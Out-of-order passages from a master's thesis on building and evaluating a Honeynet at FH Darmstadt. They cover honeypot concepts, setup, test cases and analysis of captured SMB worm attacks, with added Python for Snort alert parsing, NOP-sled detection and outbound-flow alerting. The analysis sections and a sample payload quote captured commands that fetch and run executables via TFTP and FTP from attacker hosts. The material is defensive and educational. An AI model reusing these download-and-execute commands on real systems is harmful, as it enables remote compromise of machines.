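        "gid": int(m.group(1)), "sid": int(m.group(2)), "rev": int(m.group(3)),
        "msg": m.group(4), "classification": None, "priority": None,
    }
    i = 1
    m = _CLS_RE.match(lines[i])
    if m:  # the classification/priority line is optional in Snort output
        alert["classification"] = m.group(1)
        alert["priority"] = int(m.group(2))
        i += 1
    m = _ADDR_RE.match(lines[i])  # third line: date, time, source, destination
    if not m:
        raise ValueError(f"bad address line: {lines[i]!r}")
    alert.update(date=m.group(1), time=m.group(2),
                 src=m.group(3), sport=int(m.group(4)) if m.group(4) else None,
                 dst=m.group(5), dport=int(m.group(6)) if m.group(6) else None)
    i += 1
    m = _IP_RE.match(lines[i])  # fourth line: transport protocol and IP header
    if not m:
        raise ValueError(f"bad IP header line: {lines[i]!r}")
    alert.update(proto=m.group(1), ttl=int(m.group(2)), ip_id=int(m.group(4)),
                 ip_len=int(m.group(5)), dgm_len=int(m.group(6)),
                 df=m.group(7) is not None)
    i += 1
    alert["flags"] = set()
    if alert["proto"] == "TCP" and i < len(lines):  # fifth line: TCP header
        m = _TCP_RE.match(lines[i])
        if not m:
            raise ValueError(f"bad TCP header line: {lines[i]!r}")
        alert["flags"] = decode_tcp_flags(m.group(1))
        alert.update(seq=int(m.group(2), 16), ack=int(m.group(3), 16),
                     win=int(m.group(4), 16), tcp_len=int(m.group(5)))
    return alert


def is_connection_attempt(alert: Dict[str, object]) -> bool:
    """True for a bare SYN, the packet that opens a new TCP connection. On a
    Honeynet this is the case to watch when src is the Honeypot itself."""
    return alert["proto"] == "TCP" and alert["flags"] == {"SYN"}


# Constructed alert in Snort's full format; all numbers are invented.
SAMPLE_ALERT = """\
[**] [1:2466:7] NETBIOS SMB-DS IPC$ unicode share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
06/19-14:02:12.004213 84.58.142.230:3416 -> 192.168.10.39:445
TCP TTL:113 TOS:0x0 ID:36573 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x7B9C1D3A  Ack: 0x5E2F4C10  Win: 0xFAF0  TcpLen: 20
"""

if __name__ == "__main__":
    a = parse_snort_alert(SAMPLE_ALERT)
    print(a["msg"], a["src"], "->", a["dst"], sorted(a["flags"]))
```

The parser is strict on purpose: an alert file on the Honeywall is untrusted input once an attacker controls the Honeypot, so a line that does not fit the layout raises instead of being half-parsed into a misleading event.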
101. rk traffic. On most networks it is extremely difficult to process all data, so the chance of false alarms increases with the amount of data processed. High traffic also leads to undetected attacks: when the system is not able to process all data it has to drop certain packets, which leaves those unscanned. An attacker could benefit from such high loads of network traffic.

2.6.3 Response
After successfully detecting an attack we need information to prevent further threats of the same type. Or, in case an institution has established a security policy and one of the employees violated it, the administration needs proper evidence. Honeypots provide exact evidence of malicious activities. As they are not part of production systems, any packet sent to them is suspicious and is recorded for analysis. The difference to a production server is that there is no traffic with regular data, such as traffic to and from a web server. This reduces the amount of data recorded dramatically and makes evaluation much easier. With that specific information it is fairly easy to start effective countermeasures.

2.7 Dark IP Addresses
Dark IP addresses are IP addresses which are not in use, or which are reserved rather than assigned for public use. The Internet Assigned Numbers Authority maintains a database [IANA 05] which lists the reserved IP address ranges. Also, many institutions who have been assigned a range of addresses do not use all of them. These inactive IPs are called dark
102. rovided by any installation; in addition, tools need to be installed which provide quick analysis of current data. Without the chance of direct access, i.e. in a hosted environment, the monitoring device should provide an interface for accessing the data. The problem is that access to the monitor causes extra traffic which could reveal the Honeypot's existence. Hence the analysis interface must be accessed over another path. In addition, the connection should be encrypted so that, even when discovered, its true purpose is not exposed.

3.6.5 Alerting
Quick response to attacks requires automatic notification of the operator. An automatic alerting function should be able to send messages when an intrusion is detected. Also, it should be possible to send alerts in various ways: in case an alerting message fails to be delivered, a redundant destination path should be available. The easiest trigger for alerts can be found in the nature of Honeypots. Chapter 2.5 mentions that every connection made to the Honeypot is suspicious and would not occur without the presence of a Honeypot. However, traffic which is not answered by the Honeypot is not interesting; therefore outbound data should be used to trigger alerts. This implies that any service which sends outbound traffic without user (hacker) interaction, i.e. the Browser service [Microsoft 05] on Windows machines, needs to be stopped. But the outbound trigger can also overwhelm mailboxes. An exp
103. rs:
- Barebone with Intel Pentium IV 2.80 GHz, 1 GB main memory, 150 GB hard disk space and a single network adapter.
(Footnote: Barebone: a computer with a relatively small case and a mainboard which has been assembled to fit into the small case. Typical case sizes are 20x30x20 cm. Market leader is Shuttle Inc., http://www.shuttle.com)
- Midi Tower with Intel Pentium II 500 MHz, 392 MB main memory, 8.4 GB hard disk space and three network adapters.
- Mini Tower with Intel Celeron 333 MHz, 64 MB main memory, 5 GB hard disk space and a single network adapter.
This is sufficient for two independent setups which can collect data at the same time. One setup is built at the network labs at FH Darmstadt and the other is built at my office in Mühltal.

4.3.1 Setup at Mühltal (Roo_mue)
The Midi Tower and the Mini Tower PCs are chosen for direct installation. Honeywall and Honeypot operating systems are installed with the corresponding set of drivers. Additionally, a crossover cable is used to connect the Honeypot directly with the Honeywall. The other network interfaces are connected to the local network.
[figure residue, network diagram of the Mühltal setup: remote admin 192.168.10.21 (private IP); NAT router 192.168.10.254 with a dynamic public IP from the ISP towards the Internet; LAN 192.168.10.0/24; Honeywall with remote management interface 192.168.10.20 and no IP on the inbound and outbound interfaces (bridge mode); Honey
104. (first row continued) destination port microsoft-ds, < 1 kB / 16 pkts in, RST, OS unknown.
[Walleye connection view, figure residue continued; reconstructed rows: time, duration, alerts, source → destination, protocol and ports, traffic out / in, closing flag, guessed OS]
- June 19th 14:02:17 (00:00:01): no alert; 84.155.39.102 → 192.168.10.39; TCP 63978 → 4662; 0 kB / 3 pkts out, 0 kB / 3 pkts in; RST; Windows
- June 19th 14:02:18 (00:00:01): 2 alerts, SHELLCODE x86 inc ebx NOOP; 84.58.142.230 → 192.168.10.39; TCP 3673 → microsoft-ds; 4 kB / 10 pkts out, 0 kB / 7 pkts in; FIN; OS unknown
- June 19th 14:02:19 (00:00:47): 16 alerts, TFTP Get; 192.168.10.39 → 84.58.142.230; UDP 1041 → tftp; 0 kB / 9 pkts out, 0 pkts in; OS unknown
- June 19th 14:02:41 (00:00:01): no alert; 84.58.52.111 → 192.168.10.39; TCP 4330 → microsoft-ds; 0 kB / 4 pkts out, 0 kB / 2 pkts in; FIN; Windows
- June 19th 14:02:42 (00:00:02): alerts NETBIOS SMB-DS IPC$ unicode share access, NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt, SHELLCODE x86 NOOP, unknown signature; → microsoft-ds; 0 kB / 9 pkts in
- June 19th 14:02:42 (00:00:00): no alert; 84.58.35.142 → 192.168.10.39; TCP 2484 → microsoft-ds; 0 kB / 4 pkts out, 0 kB / 2 pkts in; FIN; Windows
- June 19th 14:02:43 (00:00:05): alerts NETBIOS SMB-DS IPC$ unicode share access, NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt, SHELLCODE x86 NOOP; 84.58.52.111 → 192.168.10.39; TCP 3108 → microsoft-ds; 4 kB / 14 pkts out; RST; OS unknown; <
105. s the role of the Honeypot and a Honeywall. The connections to and from the Honeypot are under surveillance of an Intrusion Detection System on the Honeywall. Suspicious behavior can be blocked with the underlying firewall. Network access is maintained by a Layer 2 bridge without an IP address bound to the network adapters. This allows the Honeypot to be connected to any network without problems. That technique was introduced as the Gen II architecture [Honeynet 04]. Gen II is an acronym for Generation II and describes the second iteration of Honeynet architectures, which processes the packets on Layer 2. This does not change IP protocol headers and reduces the risk of revealing the existence of the Honeywall. For the convenience of extracting data a management interface is installed on the Honeywall. With this interface in place the Honeywall can be located in a closed server room and the operator can maintain it from outside.

4.2.2 Honeyd
Honeyd is an Open Source low interaction Honeypot. Its primary purpose is to detect, capture and alert on suspicious activities. It was developed by Niels Provos [Provos 02] in April 2002. Honeyd supports interesting concepts for Honeypots: it does not monitor a single IP address for activity, instead it monitors a network of dark IP addresses. It is capable of handling a large number of connections; Provos states on his website that he has tested up to 65536 connections (see
106. scribed by their role of application. To describe them in greater detail it is necessary to explain the level of interaction with the attacker.

2.4.1 Low interaction Honeypots
A low interaction Honeypot emulates network services only to the point that an intruder can log in but perform no actions. In some cases a banner can be sent back to the origin, but not more. Low interaction Honeypots are used only for detection and serve as production Honeypots. In comparison to IDS systems, low interaction Honeypots also log and detect attacks; furthermore they are capable of responding to certain login attempts, while an IDS stays passive. The attacker will only gain access to the emulated service; the underlying operating system is not touched in any way. Hence this is a very secure solution which poses little risk to the environment it is installed in.

2.4.2 Medium interaction Honeypots
Medium interaction Honeypots are further capable of emulating full services or specific vulnerabilities, i.e. they could emulate the behavior of a Microsoft IIS web server. Their primary purpose is detection and they are used as production Honeypots. Similar to low interaction Honeypots, medium interaction Honeypots are installed as an application on the host operating system and only the emulated services are presented to the public. But the emulated services on medium interaction Honeypots are more powerful, thus the chance of failu
107. serted. As said before, it is not clear where the process memory area resides. The return address is only a guess at an address which might be under the control of the process. To circumvent this, the exploit code establishes a landing zone of no operation instructions (NOPs); at the end it contains the actual code to connect back to the attacker. Hackers call this technique NOP sliding. Now the return address points back into the stack (1) and after the jump the instruction pointer slides down the NOPs (2) to the place where the shellcode is placed (3).

[figure 5.7: compromised stack (reconstructed from residue). Two columns, address and content. The entries near the top (addresses around 0xFF46, 0xFF3E, 0xFF3A) contain the value 0xFF00, the guessed return address that points back into the stack; below them lies the string "cmd /c tftp -i 84.58.142.230 GET MSASP32.exe & start MSASP32.exe"; the lowest entries (from 0xFF1C downwards) hold 0x90 NOP instructions.]

The shellcode "cmd /c tftp -i 84.58.142.230 GET MSASP32.exe & start MSASP32.exe" opens a TFTP (Trivial File Transfer Protocol) connection to the address 84.58.142.230, downloads the file MSASP32.exe and starts it (the -i switch selects binary transfer mode; the & separator runs start regardless of whether the download succeeded). Now the file is run under the privileges of the victim service and can be used to gain full control over the computer.

5.3 Log analysis in general
The first part of this chapter will list the different logs of Roo, while the second part will show some results of the experiments.

5.3.1 Roo's logs
The most important part of a Honeynet is information g
108. sis; Conclusion; final report hand in; Master's thesis.
[figure 4.1: project plan (MS Project Gantt chart residue, status date Tue 28.06.05). Columns: start (Anfang), end (Ende), task (Vorgang); the tasks run from Fri 31.12.04 to Thu 30.06.05 with intermediate end dates on Fri 04.02.05, Fri 25.02.05, Fri 18.03.05, Fri 01.04.05, Fri 27.05.05 and Fri 03.06.05. Legend: task, interruption, in progress, milestone, external milestone, project summary task, deadline, external tasks, summary task.]
The first phase of the project concentrates on gathering knowledge about Honeypots and defining requirements. The goal of this phase is to learn about existing Honeypot concepts and architectures, as well as using that knowledge to define requirements specific to the department of Informatics at FH Darmstadt. The Development phase concentrates on selecting a particular solution and preparing the requirements for an experiment. At
109. [figure residue: Ethereal packet list and decode of the SMB exploit flow, reconstructed; unreadable fields omitted]
Packet list (No., time, source, destination, protocol, info):
3  0.094350  192.168.10.39 → 84.58.142.230  TCP  microsoft-ds > 3673 [ACK] Seq=0 Ack=1444 Win=17280 Len=0
4  0.177720  84.58.142.230 → 192.168.10.39  TCP  [Continuation to #1] 3673 > microsoft-ds [ACK] Seq=1444 Ack=0
5  0.258705  84.58.142.230 → 192.168.10.39  TCP  [Continuation to #1] 3673 > microsoft-ds [PSH, ACK] Seq=2884
6  0.260805  192.168.10.39 → 84.58.142.230  TCP  microsoft-ds > 3673 [ACK] Seq=0 Ack=4291 Win=17280 Len=0
7  0.426134  192.168.10.39 → 84.58.142.230  SMB  Session Setup AndX Response, Error: STATUS_ACCESS_VIOLATION
Decode of frame 2 (1494 bytes on wire, 1494 bytes captured): Ethernet II, Src 00:30:c5:c7:d6:76, Dst 00:10:46:50:aa:77; Internet Protocol, Src Addr 84.58.142.230, Dst Addr 192.168.10.39; Transmission Control Protocol, Src Port 3673, Dst Port microsoft-ds (445), Sequence number 4 (relative), Next sequence number 1444 (relative), Ack 0, Len 1440.
Hex dump excerpt, offsets 0x0530 to 0x0570, ASCII column: "....cmd /c tftp -i 84.58.142.230 GET MSASP32.exe & start MSASP32.exe & exit" terminated by a NUL byte and followed by filler bytes 0x42 ("BBBB...").
110. ss in the stack, the hacker does not know where exactly the code with the wanted instruction is placed. Therefore a landing zone of no operation instructions is used to find the wanted code. In this case the programmer did not use the NOP operation but the INC EBX instruction (opcode 0x43, INC EBX [Intel 97]), which increments the EBX register. Actually, instruction 0x90 is the official NOP (no operation) instruction, but the worm code does not care about the state of the registers, so INC EBX can be used as a NOP. Packets 2 and 4 contain some shellcode. To be able to read it properly, the flows need to be reassembled. To do this the packet capture is loaded in Ethereal and the analysis function "Follow TCP stream" is applied. Now the stream is searched for human readable commands:

[figure 5.18: extracted code (reconstructed from residue; the address and port in the first line are partly unreadable in the original figure)]
cmd /c echo open 205.177.73.21 58739 > cdtime.asp
cmd /c echo user wh0re gotfucked >> cdtime.asp
cmd /c echo binary >> cdtime.asp
cmd /c echo get kimo.exe >> cdtime.asp
cmd /c echo bye >> cdtime.asp
cmd /c ftp.exe -n -s:cdtime.asp & cmd /c del cdtime.asp & start kimo.exe

The executable cmd.exe is used in Windows NT, Windows 2000, Windows XP and Windows 2003 Server to open a command shell. Option /c is used to close the shell after completion of the command. Echo is used in batch commands to output text. With the operator > the standard output is redirected from the console to the targ
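The sled detection and command extraction described in this section, the stack figure of 5.2 and the Ethereal decode, as an added example that is not code from the thesis: the block scans a payload for runs of 0x90 (NOP) or 0x43 (INC EBX), pulls out any "cmd /c ..." string behind the sled, and extracts the TFTP download target so it can be blocked on the Honeywall or fetched for analysis. SAMPLE_PAYLOAD is constructed for this example; the sled opcodes and the command string are the ones recovered in the text, while the 0x42 filler, the byte layout and the MIN_SLED_LEN threshold are assumptions.

```python
"""Added example, not from the thesis: find a NOP sled in a captured payload
and extract the Windows command string behind it, which is what the Snort
"SHELLCODE x86 NOOP" / "x86 inc ebx NOOP" signatures and the manual
"Follow TCP stream" step do. SAMPLE_PAYLOAD is constructed for this example."""
import re
from typing import List, Tuple

# Single-byte x86 instructions usable as sled filler. 0x43 (INC EBX) works as
# a NOP here because the payload does not depend on the value of EBX.
SLED_OPCODES = {0x90: "NOP", 0x43: "INC EBX"}
MIN_SLED_LEN = 16  # assumed threshold: shorter runs are usually just data


def find_sleds(payload: bytes, min_len: int = MIN_SLED_LEN) -> List[Tuple[int, int, str]]:
    """Return (offset, length, mnemonic) for every run of one sled opcode
    that is at least min_len bytes long."""
    sleds = []
    i, n = 0, len(payload)
    while i < n:
        b = payload[i]
        if b not in SLED_OPCODES:
            i += 1
            continue
        j = i
        while j < n and payload[j] == b:
            j += 1
        if j - i >= min_len:
            sleds.append((i, j - i, SLED_OPCODES[b]))
        i = j
    return sleds


# A Windows "cmd /c ..." string of printable ASCII; it ends at the first
# non-printable byte (the NUL terminator seen in the capture).
_CMD_RE = re.compile(rb"cmd(?:\.exe)? /c [ -~]+")


def extract_commands(payload: bytes) -> List[str]:
    """Return every embedded 'cmd /c' command line, split on the '&'
    separator so that each chained command is listed on its own."""
    cmds: List[str] = []
    for m in _CMD_RE.finditer(payload):
        text = m.group(0).decode("ascii")
        cmds.extend(part.strip() for part in text.split("&") if part.strip())
    return cmds


_TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+GET\s+(\S+)", re.IGNORECASE)


def tftp_download_targets(commands: List[str]) -> List[Tuple[str, str]]:
    """Return (server, filename) for each 'tftp -i <server> GET <file>'."""
    found = []
    for c in commands:
        m = _TFTP_RE.search(c)
        if m:
            found.append((m.group(1), m.group(2)))
    return found


# Constructed payload: two junk bytes, a 32-byte INC EBX sled, four 0xff bytes,
# a 20-byte 0x90 sled, the command string from figure 5.7, a NUL, and filler.
SAMPLE_PAYLOAD = (
    b"\x00\x01"
    + b"\x43" * 32
    + b"\xff\xff\xff\xff"
    + b"\x90" * 20
    + b"cmd /c tftp -i 84.58.142.230 GET MSASP32.exe & start MSASP32.exe\x00"
    + b"\x42" * 8
)

if __name__ == "__main__":
    for off, length, name in find_sleds(SAMPLE_PAYLOAD):
        print(f"sled: {length} x {name} at offset {off}")
    cmds = extract_commands(SAMPLE_PAYLOAD)
    print("commands:", cmds)
    print("tftp downloads:", tftp_download_targets(cmds))
```

Feed it the reassembled stream rather than a single packet: as the text notes, the sled and the command may be spread over packets 2 and 4, and a run of filler bytes that straddles a packet boundary will fall below the threshold if each packet is scanned on its own.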
111. supported; main memory: min 256 MB (but not very performant), suggested 512 MB or more; hard disk: 4 GB is sufficient for experimental systems, suggested 10 GB or more (the basic installation occupies about 550 MB).
(Footnotes: 1 Honeynet Project, http://www.honeynet.org/tools/cdrom/Roo/iso/current; 2 Roo manual, http://www.honeynet.org/tools/cdrom/Roo/manual; ASCII problem, http://www.md5summer.org/ascii)
IDE or SCSI: currently the following SCSI controllers are supported (see the online manual for an up to date list):
[figure 1: overview of supported controllers (table not recoverable)]
(Footnote 3: online Roo manual, http://www.honeynet.org/tools/cdrom/Roo/manual/2-require.html)
Network adapter: min 2 NICs, suggested 3 for using the remote management interface (optional). The following network controllers are supported (see the online manual for an up to date list):
figure 2: supported network adapters (Linux driver names): 3c501, 3c503, 3c505, 3c507, amd8111e, atp, b44, de600, de620, depca, dgrs, dmfe, forcedeth, hamachi, hp100, hp, hp-plus, ns83820, pcnet32, ppp_async, ppp_deflate, ppp_generic, pppoe, pppox, smc-ultra, starfire, sundance, sungem, sungem_phy, sunhme, tg3, tlan, tulip, winbond-840, xircom_cb (a few entries were not readable)
CD-ROM: only for installation.

2.2 Setup
Before installing, please make sure that the target hard disk is empty
112. t many people are still not aware of it or even think that security patches ruin their computers. On the other hand there are many institutions which are not allowed to update their operating system by contract. This is due to a service contract which guarantees the function of a product under specified conditions. Usually those contracts are not updated as soon as a security fix is available. Therefore the hole could be fixed but is not. It is to be hoped that the improved security awareness of customers will push the vendors to update those contracts in shorter periods.

4 Planning a Honeypot for FHD
The practical approach to determine a Honeypot solution was divided into four phases: analysis, development, realization and conclusion. This chapter describes the project plan for the experiment in general and discusses the analysis and development phases. Details of the realization phase can be found in chapter 5.
[figure 4.1, project plan, task list (Gantt chart residue; columns Nr and Vorgangsname, i.e. number and task name): Analysis; general project planning; task definition; research for current techniques; requirements analysis; Development; evaluation of current solutions; hand in requirements catalogue; planning of an experimental Honeypot; hand in setup description for a Honeypot; Realization; implementation of an experimental Honeypot; field trial; results analysis; Improving the Honeypot; finish of results analy
113. te the demands on Honeypots. The use of a Honeypot poses risk (see 3.5) and needs exact planning ahead to avoid damage. Therefore it is necessary to consider what environment will be the basis for the installation. Depending on the setup the results are quite different and need to be analyzed separately. For example, the number of attacks occurring in a protected environment (Scenario II, see 3.2) is lower than the number of attacks coming from the internet (see 5.4 for detailed results), or at least it should be. Therefore a comparison of results afterwards needs to take the environment into account. In every case there is a risk in using a Honeypot; risk is added on purpose by the nature of a Honeypot. A compromised Honeypot (in hacker terms an "owned box") needs intensive monitoring but also strong controlling mechanisms. Scenario VI discusses requirements on a Honeypot out of the box solution and elaborates different functions which have to be provided.

3.1 Scenario I: unprotected environment
In an unprotected environment any IP address on the internet is able to initiate connections to any port on the Honeypot. The Honeypot is accessible from the entire internet.
[figure 3.1: unprotected environment (Internet; Honeypot with public IP or with private IP)]
An adequate setup needs to ensure that the monitoring and logging capabilities are sufficient for handling large numbers of packets. An e
114. tering date and time (Windows 2000/XP).
6. Verify that the time corresponds to your chosen time. Pass / Fail
3.1.4 Verification
Verify that R001 (date and time) is satisfied with steps 2, 4 and 6.
Results Summary
figure 5.1: example of a test case

5.2 Internet attacks
The following chapter will investigate attacks from the internet in general. The information is based on experiences made during the experiment and supplemented by investigation of background details. Chapter 5.2.1 will explain what can be attacked and the chapter afterwards will describe an example of an attack. As Microsoft Windows operating systems were used for the Honeypots, part of the discussion will refer to attacks targeting Windows.

5.2.1 Targets for hackers
Communication on the internet is established by the internet protocol suite. The underlying basis is the internet architecture, which must be supported by every host [RFC 1122]. The protocol layers used in the Internet architecture are as follows:
Application layer: The application layer is the top layer of the Internet protocol suite. It contains data which is directly handled by applications and processes. We distinguish two categories of application layer protocols: user protocols that provide service directly to users (HTTP, FTP, SMTP) and support protocols that provide common system functions (DNS, BOOTP, SNMP).
115. the end, a setup description should define the basis for the next phase. It is also the end of the theoretical work. Practical tasks start with the realization phase. It is based on practical research and empirical analysis. Evaluated results will be taken into consideration for improving the requirements. The goal is to state whether the selected Honeypot solution is suitable for productive use at FH Darmstadt. To support this statement it is necessary to understand and control the solution's potential and features. In the final phase the gathered results and conclusions are summarized. A statement will show whether the Honeypot solution is feasible; results of the preceding phases will support this statement.

4.1 Environment analysis
The purpose of this project is to improve network security at the computer science department of FH Darmstadt. Hence it is necessary to understand the type of location of the network, in order to apply the scenarios of chapter 3. The FH campus network consists of the public address range 141.100.0.0/24. It is a subnet of the public internet address space of the DFN, the German Research Network (Deutsches Forschungsnetz). The address range corresponds to Scenario III (public address). The campus border gateway is protected by a firewall. Inbound traffic is denied by default and only permitted to particular hosts such as webservers. The corresponding scenario is Scenario II
116. thered into flows to reduce the number of items to be analyzed. This includes bi-directional traffic to and from the target. The challenge is to categorize each flow. It is easy to assign a purpose to a flow by checking the destination port. In most cases this is satisfactory, but in some circumstances a flow to a specified port does not contain valid data, or it might be a port scan. Therefore categorizing a flow by its port number is not always valid; Intrusion Detection Systems (IDS) help identifying it further. UDP connections are stateless and do not provide extra options to relate them to an individual flow. The IDS Snort by Martin Roesch [Roesch 05] defines a flow as unique by the combination of IP protocol, source IP, source port, destination IP and destination port. In the Internet Protocol version 4 (IPv4) [RFC 791] there is an 8 bit field called Protocol to identify the next level protocol. It is difficult to analyze protocols which are neither TCP nor UDP, as most analysis tools, i.e. Snort (see 4.4.1), are based on these protocols.

3.6.4 Accessibility
Well grounded setups cover security and promote easy and complete ways to analyze data. Further, an operator needs quick access to this data. Also, a way of notifying of events needs to be implemented. In order to check data and logs frequently the operator needs physical or network access. Direct access to the console is p
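The flow definition above and the outbound alert trigger of section 3.6.5, as one added example that is not code from the thesis: packets are grouped into bi-directional flows keyed by the Snort five-tuple (IP protocol, source IP, source port, destination IP, destination port), the initiator of each flow is recorded, and an alert is raised only for flows the Honeypot itself opens, with a per-destination limit so that a scanning worm on the Honeypot cannot flood the operator's mailbox. The packet records, the honeypot address and the rate limit values are constructed for this example; the trigger for ICMP, which has no ports, zeroes both port fields as an assumption.

```python
"""Added example, not from the thesis: five-tuple flow aggregation plus an
outbound-only alerter with a per-destination rate limit. All traffic below is
constructed for this example."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

HONEYPOT_IP = "192.168.10.39"  # assumed: the Honeypot address of the FHD setup


@dataclass
class Packet:
    ts: float
    proto: str       # "TCP", "UDP" or "ICMP"
    src: str
    sport: int
    dst: str
    dport: int
    length: int
    syn: bool = False  # TCP SYN without ACK: this packet opens a connection


FlowKey = Tuple[str, str, int, str, int]


@dataclass
class Flow:
    key: FlowKey
    first_ts: float
    last_ts: float
    packets: int = 0
    bytes: int = 0
    initiator: Optional[str] = None  # who sent the first packet or the SYN


def flow_key(p: Packet) -> FlowKey:
    """Snort's five-tuple, made bi-directional by ordering the two endpoints
    so that A->B and B->A land in the same flow. ICMP has no ports, so they
    are zeroed (assumption for this example)."""
    a = (p.src, p.sport if p.proto != "ICMP" else 0)
    b = (p.dst, p.dport if p.proto != "ICMP" else 0)
    lo, hi = sorted([a, b])
    return (p.proto, lo[0], lo[1], hi[0], hi[1])


def build_flows(packets: List[Packet]) -> Dict[FlowKey, Flow]:
    flows: Dict[FlowKey, Flow] = {}
    for p in sorted(packets, key=lambda x: x.ts):
        k = flow_key(p)
        f = flows.get(k)
        if f is None:
            f = Flow(key=k, first_ts=p.ts, last_ts=p.ts, initiator=p.src)
            flows[k] = f
        if p.syn:  # a SYN is a better initiator signal than "first seen"
            f.initiator = p.src
        f.last_ts = p.ts
        f.packets += 1
        f.bytes += p.length
    return flows


class OutboundAlerter:
    """Alert when the Honeypot initiates a flow: inbound traffic is suspicious
    by definition, but outbound traffic means the box is owned. At most
    max_per_dst alerts per destination within window seconds."""

    def __init__(self, honeypot_ip: str, max_per_dst: int = 2, window: float = 3600.0):
        self.hp = honeypot_ip
        self.max_per_dst = max_per_dst
        self.window = window
        self._sent: Dict[str, List[float]] = defaultdict(list)

    def alerts(self, flows: Dict[FlowKey, Flow]) -> List[str]:
        msgs = []
        for f in sorted(flows.values(), key=lambda x: x.first_ts):
            if f.initiator != self.hp:
                continue
            proto, ip1, p1, ip2, p2 = f.key
            dst, dport = (ip2, p2) if ip1 == self.hp else (ip1, p1)
            recent = [t for t in self._sent[dst] if f.first_ts - t < self.window]
            self._sent[dst] = recent
            if len(recent) >= self.max_per_dst:
                continue  # suppressed: the operator already knows about this target
            self._sent[dst].append(f.first_ts)
            msgs.append(f"OUTBOUND {proto} {self.hp} -> {dst}:{dport} "
                        f"({f.packets} pkts, {f.bytes} bytes)")
        return msgs


# Constructed traffic: an inbound SMB attack, then the Honeypot fetching a
# file over TFTP and probing two hosts on port 445.
SAMPLE = [
    Packet(0.0, "TCP", "84.58.142.230", 3673, HONEYPOT_IP, 445, 48, syn=True),
    Packet(0.1, "TCP", HONEYPOT_IP, 445, "84.58.142.230", 3673, 48),
    Packet(0.3, "TCP", "84.58.142.230", 3673, HONEYPOT_IP, 445, 1494),
    Packet(1.0, "UDP", HONEYPOT_IP, 1041, "84.58.142.230", 69, 40),
    Packet(1.1, "UDP", "84.58.142.230", 69, HONEYPOT_IP, 1041, 516),
    Packet(5.0, "TCP", HONEYPOT_IP, 1042, "10.0.0.5", 445, 48, syn=True),
    Packet(5.1, "TCP", HONEYPOT_IP, 1043, "10.0.0.5", 445, 48, syn=True),
    Packet(5.2, "TCP", HONEYPOT_IP, 1044, "10.0.0.5", 445, 48, syn=True),
    Packet(6.0, "TCP", HONEYPOT_IP, 1045, "10.0.0.6", 445, 48, syn=True),
]


def run_sample(max_per_dst: int = 2) -> List[str]:
    return OutboundAlerter(HONEYPOT_IP, max_per_dst=max_per_dst).alerts(build_flows(SAMPLE))


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

With the constructed traffic the inbound SMB flow produces no alert, the TFTP fetch and the first two probes of 10.0.0.5 do, the third probe of 10.0.0.5 is suppressed by the rate limit, and the probe of 10.0.0.6 is reported again because it is a new destination.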
117. tive on the wrong interface, IPs could be set wrongly, and so on. Ensure that the physical and logical devices on the machines are set correctly. The network adapter mapping and cabling have to match the desired networks: eth0 is normally used for the production network, eth1 for the Honeynet and eth2 for the remote management interface.
(Footnotes: 1 The phone number for this service is +49 531 51 20 38; a quick description of the European telephone time code can be found at http://www.ptb.de/en/org/4/44/442/index.htm. NTP servers of the PTB are ptbtime1.ptb.de (192.53.103.103) and ptbtime2.ptb.de (192.53.103.104). 2 Ateco offers the Expert mouseCLOCK, a reasonably priced and reliable device, http://www.ateco.de/funkuhren.htm; another vendor is Meinberg, http://www.meinberg.de)
On a real machine you can compare the MAC addresses printed by ifconfig with the ones printed on the cards. VMware assigns eth0 to NIC1, eth1 to NIC2 and eth2 to NIC3. Verify that each NIC is mapped to the proper network connection; see figure 5.3 for more details. This is also a very basic and important requirement: a Honeypot without connectivity, without the chance of receiving attacks, is absolutely worthless.
[table residue: the Need, Ex and Attain rows of R004 and R005 follow]
R004: Honeypot is able to establish outbound and inbound connections to the external network.
R005: Honeypot is able to access the interna
118. to establish outbound and inbound connections to the internal network using the IP protocol; Honeypot should be able to establish outbound and inbound connections to the internet using the IP protocol; Honeypot should be able to resolve internet DNS addresses; Honeypot is denied access to restricted IP addresses; Honeywall is logging traffic from R001; Walleye is activated and accepting logins; Walleye is displaying the current time; Walleye is displaying traffic from R001; Honeywall sends alert messages; Sebek is running.

3 Test Cases
3.1 Test Case 1: time and date
3.1.1 Purpose
Verify that requirement R001 has been satisfied: Honeypot and Honeywall are set with the correct time and date.
3.1.2 Setup
Precondition: the basic setup has been done (see section 1.2). This test requires a watch.
3.1.3 Execution
1. Check time and date on the Honeywall by entering date.
2. Verify that the time corresponds to your chosen time. Pass / Fail
3. Check time and date on the Honeypot by entering date and time (Win).
4. Verify that the time corresponds to your chosen time. Pass / Fail
5. Check time and date on the Honeypot by entering date and time (Win).
6. Verify that the time corresponds to your chosen time. Pass / Fail
3.1.4 Verification
Verify that R001 (date and time) is satisfied with steps 2, 4 and 6.
3.1.5 Results Summary
119. ur ECHO replies from hpIP. Pass / Fail
16. Honeypot pings attacker by executing ping <attIP>.
17. Observe that the Honeypot gets a minimum of four ECHO replies from attIP. Pass / Fail
3.3.4 Verification
Verify that R003 (internal IP functionality) is satisfied with steps 15 and 17.
3.3.5 Results Summary

3.4 Test Case 4: external IP functionality
3.4.1 Purpose
Verify that requirement R004 has been satisfied and the Honeypot is reachable from the internet.
3.4.2 Setup
Precondition: the basic setup has been done (see section 1.2). The attacker has an IP from the internet. No other setup is necessary.
3.4.3 Execution
18. Attacker pings Honeypot by executing ping <hpIP>.
19. Observe that the attacker gets a minimum of four ECHO replies from hpIP. Pass / Fail
20. Honeypot pings attacker by executing ping <attIP>.
21. Observe that the Honeypot gets a minimum of four ECHO replies from attIP. Pass / Fail
3.4.4 Verification
Verify that R004 (external IP functionality) is satisfied with steps 19 and 21.
3.4.5 Results Summary

3.5 Test Case 5: DNS functionality
3.5.1 Purpose
Verify that requirement R005 has been satisfied and the Honeypot is able to resolve internet addresses.
3.5.2 Setup
Precondition: the setup is the same as in
120. ut when functioning, Walleye is the tool of choice.
Attain: If this error occurs it might be due to a bad installation. Download the Roo image again and reinstall it. This might occur even if the MD5 checksum of the ISO image matches; sometimes it is due to a bad CD.

R011 Honeywall sends alert messages
Need: Roo sends alert messages to inform the operator of a compromised Honeypot (see swatch in 4.4.1).
Ex: The receiving mail server could refuse mails because the mail address is not of its domain.
